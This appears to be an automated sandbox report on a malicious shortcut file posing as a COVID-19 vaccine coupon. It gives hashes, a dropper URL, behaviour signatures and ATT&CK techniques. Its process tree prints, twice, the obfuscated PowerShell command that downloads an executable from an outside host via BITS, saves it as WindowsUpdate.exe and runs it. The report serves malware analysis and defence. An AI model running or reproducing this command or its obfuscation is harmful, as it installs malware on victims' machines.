Overview

overview

10

Static

static

3

COVID-19-V...on.lnk

windows7_x64

10

COVID-19-V...on.lnk

windows10-2004_x64

10

EUA 27034_...21.pdf

windows7_x64

1

EUA 27034_...21.pdf

windows10-2004_x64

8

SUMMARY OF...en.pdf

windows7_x64

1

SUMMARY OF...en.pdf

windows10-2004_x64

1

Analysis

  • max time kernel
    133s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    28-02-2022 03:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    COVID-19-Vaccine-Coupon/COVID-19-Vaccine-Coupon.lnk

  • Size

    1KB

  • MD5

    5897322f62070e894488b4115463939d

  • SHA1

    217490d9df6b3eb30caec933c6f3a04ae3a3a82f

  • SHA256

    101d9f3a9e4a8d0c8d80bcd40082e10ab71a7d45a04ab443ef8761dfad246ca5

  • SHA512

    83cdc338ce8c7f5bf030ddd654a17b3a7fc6283d9331e5c0eeadc3e4c98aacfb72d51890e9dcb56f4115cd05fba09a0d45a2c751e599c1c45122b86db65f87d1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://1000018.xyz/soft-2/280421-z1z.exe

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\COVID-19-Vaccine-Coupon\COVID-19-Vaccine-Coupon.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://1000'+'018.x'+'yz'+'/so'+'ft-2'+'/28'+'04'+'21-z1z.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://1000'+'018.x'+'yz'+'/so'+'ft-2'+'/28'+'04'+'21-z1z.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2960-130-0x000002A0CC580000-0x000002A0CC5A2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2960-131-0x000002A0CC600000-0x000002A0CC614000-memory.dmp
    Filesize

    80KB

    Download
  • memory/2960-132-0x00007FFF381E3000-0x00007FFF381E5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2960-134-0x000002A0AEF63000-0x000002A0AEF65000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2960-133-0x000002A0AEF60000-0x000002A0AEF62000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2960-135-0x000002A0AEF66000-0x000002A0AEF68000-memory.dmp
    Filesize

    8KB

    Download